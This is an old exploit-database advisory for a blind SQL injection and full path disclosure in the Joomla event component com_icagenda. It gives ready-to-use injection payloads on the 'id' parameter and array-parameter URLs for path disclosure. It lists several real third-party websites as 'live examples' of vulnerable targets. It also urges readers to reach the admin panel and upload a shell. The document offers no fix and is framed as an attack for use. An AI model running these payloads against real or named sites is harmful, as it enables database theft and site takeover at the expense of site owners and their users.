# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 # 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 # 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 # 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 # 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 # 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 # 1 \ \____/ >> Exploit database separated by exploit 0 # 0 \/___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [x] Official Website: http://www.1337day.com 0 # 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 # 0 0 # 1 ========================================== 1 # 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 # 0 1 # 1 dark-puzzle[at]live[at]fr 0 # 0 ========================================== 1 # 1 White Hat 1 # 0 Independant Pentester 0 # 1 exploit coder/bug researcher 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Exploit Title: Joomla Component (com_icagenda) Blind SQLi/Path Disclosure . # Date: 31 August 2012 # Author: Dark-Puzzle (Souhail Hammou) # Risk : Critical # Version: All Versions # Google Dork : N/A # Category: Webapps/0day # Tested on: Windows Xp Sp2 Fr . # Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ... *************************************************************************************** Info : Icagenda is a New Component for Event Management with a calendar module. ---------------------------------------------------- I - Blind SQL Injection Vulnerability ---------------------------------------------------- Vulnerability : "id" parameter in com_icagenda is prone to a Blind SQL Vulnerability . An attacker can retrieve & steal data by sending series of True and False Queries through SQL statements . Here the invisible content shows us that the target suffers from BSQLi . Example : www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False) Live Example : http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) Content is displayed http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False) Other Live Examples : http://www.brie-danse.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=133&id=3 and 1=2 (False) --> Blind Injection . http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=107&id=1 and 1=2 (False) --> Blind Injection ADMIN PANEL : http://target/administrator Then you can upload your shell & enjoy the rest . ----------------------------------------------------- II - Full Path Disclosure Vulnerability ----------------------------------------------------- The Full path can be retrieved using Array method [] in ItemID & id Parameters . Live Examples : http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid[]=107&id=1 http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 # Datasec Team